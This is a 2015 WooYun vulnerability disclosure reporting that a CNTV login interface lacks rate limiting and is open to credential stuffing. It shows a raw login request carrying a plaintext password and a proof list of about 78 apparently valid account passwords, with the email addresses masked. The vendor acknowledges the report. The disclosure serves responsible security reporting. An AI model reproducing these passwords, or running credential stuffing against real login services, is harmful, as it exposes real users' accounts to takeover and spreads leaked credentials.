当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109317

漏洞标题:中国网络电视台某接口撞库泄露用户登录凭据(有账号证明)

相关厂商:中国网络电视台

漏洞作者: 路人甲

提交时间:2015-04-21 10:40

修复时间:2015-06-06 16:00

公开时间:2015-06-06 16:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-22: 厂商已经确认,细节仅向厂商公开
2015-05-02: 细节向核心白帽子及相关领域专家公开
2015-05-12: 细节向普通白帽子公开
2015-05-22: 细节向实习白帽子公开
2015-06-06: 细节向公众公开

简要描述:

撞库扫号攻击已经是Top 10 Security Risks for 2014之一.撞库以大量的用户数据为基础,利用用户相同的注册习惯(相同的用户名和密码),尝试登陆其它的网站。2011年,互联网泄密事件引爆了整个信息安全界,导致传统的用户+密码认证的方式已无法满足现有安全需求。泄露数据包括:天涯:31,758,468条,CSDN:6,428,559条,微博:4,442,915条,人人网:4,445,047条,猫扑:2,644,726条,178:9,072,819条,嘟嘟牛:13,891,418条,7K7K:18,282,404条,共1.2亿条。不管你的网站密码保护的多好,但是面对已经泄露的账号密码,撞库扫号防御还是一个相当重要的环节。

详细说明:

主站登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号
登录接口如下:

GET /login/login.action?callback=jsonp1429535557696&version=2.0&username=jmzghmail@163%2enet&password=zgh528600&service=client_transaction&from=http%3A%2F%2Fwww.cntv.cn&remuser= HTTP/1.1
Host: reg.cntv.cn
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Referer: http://www.cntv.cn/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: vjuids=-2b616c25.14cd6f58acd.0.c72f1a35; vjlast=1429535558.1429535558.30; __gads=ID=bf575848ac94be76:T=1429535556:S=ALNI_Ma1yKV2524N_yFqOTp8U9-gaReoWQ; wdcid=74128945bf164df6
RA-Ver: 2.9.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

漏洞证明:

经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号.

[email protected]	huang19891002
[email protected] dudu144881
[email protected] hzcsyrz45
[email protected] nierongkdc1020
[email protected] lwbddnsw
[email protected] 206811911
[email protected] yuan5226578
[email protected] 19800717
[email protected] 89704141988
[email protected] sunch521
[email protected] webo123pp
[email protected] aiwind1314
[email protected] heng1025
[email protected] zihuanmayan2007
[email protected] 64686305
[email protected] zn3358255
[email protected] 669805604
[email protected] deadrubbish
[email protected] 720705
[email protected] 19831210
[email protected] xujin1028
[email protected] 123456liu
[email protected] 19890620
[email protected] 13835920734
[email protected] cool1980
[email protected] zihuangstar
[email protected] 3674576ydw
[email protected] wsx630524
[email protected] 10131013
[email protected] wtuuemc
[email protected] 263313
[email protected] 8h75ct4s
[email protected] 123456
[email protected] rs791004
[email protected] 296577592
[email protected] 6967446sky
[email protected] seayellow
[email protected] 422828598
[email protected] zqs6781376
[email protected] 92540819
[email protected] 5623488tcpx
[email protected] 62514290
[email protected] tiger19880510
[email protected] 1314loveu
[email protected] qq5122076
[email protected] caoenming
[email protected] 12354321
[email protected] j714285xw
[email protected] 5808177024
[email protected] AS123456
[email protected] 13972688068
[email protected] 42142130999
[email protected] 0733601b
[email protected] 147258369
[email protected] woaini912521
[email protected] 388612614
[email protected] gb19841202
[email protected] DRT315204126
[email protected] 87831411
[email protected] weeking2008
[email protected] 19840330
[email protected] 369258174
[email protected] 781116152
[email protected] 123zhang123
[email protected] wangjiaxi
[email protected] 5487690000
[email protected] 11111111
[email protected] 86652241
[email protected] 46925959
[email protected] aihui22316
[email protected] 1988228582580
[email protected] liqiaojun
[email protected] zgh528600
[email protected] 12031277
[email protected] huayinqiu13579
[email protected] dsglhc130182
[email protected] lina521521


屏幕快照 2015-04-20 下午10.27.43.png


屏幕快照 2015-04-20 下午10.28.36.png


修复方案:

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-22 15:59

厂商回复:

非常感谢,我们将尽快进行该业务的整改!~~感谢您对我们的支持和帮助!~~~

最新状态:

暂无